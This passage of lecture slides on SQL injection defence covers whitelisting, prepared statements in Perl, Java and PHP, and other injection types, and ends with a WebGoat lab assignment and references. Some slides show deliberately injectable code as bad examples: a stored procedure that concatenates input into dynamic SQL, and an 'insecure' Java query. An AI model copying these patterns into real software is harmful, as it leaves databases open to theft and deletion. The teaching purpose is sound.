    Stored Procedures Stored Proceduresbuild strings too: CREATE PROCEDURE dbo.doQuery(@id nchar(128)) AS DECLARE @query nchar(256) SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’ EXEC @query RETURN it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection. It's only proper binding with prepare/execute or direct SQL statements with bound variables that provide protection.
  • 29.
    Whitelist Reject input thatdoesn’t match your list of safe characters to accept. – Identify what is good, not what is bad. – Reject input instead of attempting to repair. – Still have to deal with single quotes when required, such as in names.
  • 30.
    Prepared Queries  boundparameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. Later, this prepared query is "executed" with a list of parameters. Example in Perl: $sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;"); $sth->execute($email); $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.
  • 31.
    Prepared Queries  boundparameters in Java Insecure version Statement s = connection.createStatement(); ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = " + formField); // *boom* Secure version PreparedStatement ps = connection.prepareStatement( "SELECT email FROM member WHERE name = ?"); ps.setString(1, formField); ResultSet rs = ps.executeQuery(); There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.
  • 32.
    References: http://devzone.zend.com/article/686 http://unixwiz.net/techtips/sql-injection.html <?php $mysqli = newmysqli('localhost', 'user', 'password', 'world'); /* check connection */ if (mysqli_connect_errno()) { printf("Connect failed: %sn", mysqli_connect_error()); exit(); } $stmt = $mysqli->prepare("INSERT INTO CountryLanguage VALUES (?, ?, ?, ?)"); $stmt->bind_param('sssd', $code, $language, $official, $percent); // ‘sssd’ specifies format $code = 'DEU'; $language = 'Bavarian'; $official = "F"; $percent = 11.2; /* execute prepared statement */ $stmt->execute(); printf("%d Row inserted.n", $stmt->affected_rows); /* close statement and connection */ $stmt->close(); /* Clean up table CountryLanguage */ $mysqli->query("DELETE FROM CountryLanguage WHERE Language='Bavarian'"); printf("%d Row deleted.n", $mysqli->affected_rows); /* close connection */ $mysqli->close(); ?> Prepared Queries
  • 33.
    Other Injection Types •Shell injection. • Scripting language injection. • File inclusion. • XML injection. • XPath injection. • LDAP injection. • SMTP injection.
  • 34.
    SQL injection Conclusion •SQL injection is technique for exploiting applications that use relational databases as their back end. • Applications compose SQL statements and send to database. • SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
  • 35.
    SQL injection Conclusion The technique is based on malformed user- supplied data  Transform the innocent SQL calls to a malicious call  Cause unauthorized access, deletion of data, or theft of information  All databases can be a target of SQL injection and all are vulnerable to this technique.  The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
  • 36.
    Project 7: Dueon April 25 • Visit the website for information about webGoat: http://www.irongeek.com/i.php?page=videos/webgoat-sql-injection • Read WebGoad User and Install Guide http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project • Install WebGoat and play with SQL injection.
  • 37.
    References 1. Andres Andreu,Professional Pen Testing for Web Applications, Wrox, 2006. 2. Chris Anley, “Advanced SQL Injection In SQL Server Applications,” http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002. 3. Stephen J. Friedl, “SQL Injection Attacks by Example,” http://www.unixwiz.net/techtips/sql- injection.html, 2005. 4. Ferruh Mavituna, SQL Injection Cheat Sheet, http://ferruh.mavituna.com/sql-injection- cheatsheet-oku 5. J.D. Meier, et. al., Improving Web Application Security: Threats and Countermeasures, Microsoft, http://msdn2.microsoft.com/en-us/library/aa302418.aspx, 2006. 6. Randall Munroe, XKCD, http://xkcd.com/327/ 7. OWASP, OWASP Testing Guide v2, http://www.owasp.org/index.php/Testing_for_SQL_Injection, 2007. 8. Joel Scambray, Mike Shema, and Caleb Sima, Hacking Exposed: Web Applications, 2nd edition, Addison-Wesley, 2006. 9. SEMS, “SQL Injection used to hack Real Estate Web Sites,” http://www.semspot.com/2007/12/19/sql-injection-used-to-hack-real-estate-websites- extreme-blackhat/, 2007. 10. Chris Shiflett, Essential PHP Security, O’Reilly, 2005. 11. SK, “SQL Injection Walkthrough,” http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002. 12. SPI Labs, “Blind SQL Injection,” http://sqlinjection.com/assets/documents/Blind_SQLInjection.pdf, 2007. 13. Dafydd Stuttard and Marcus Pinto, Web Application Hacker’s Handbook, Wiley, 2007. 14. WASC, “Web Application Incidents Annual Report 2007,” https://bsn.breach.com/downloads/whid/The%20Web%20Hacking%20Incidents%20Datab ase%20Annual%20Report%202007.pdf, 2008.
  • 38.
  • 39.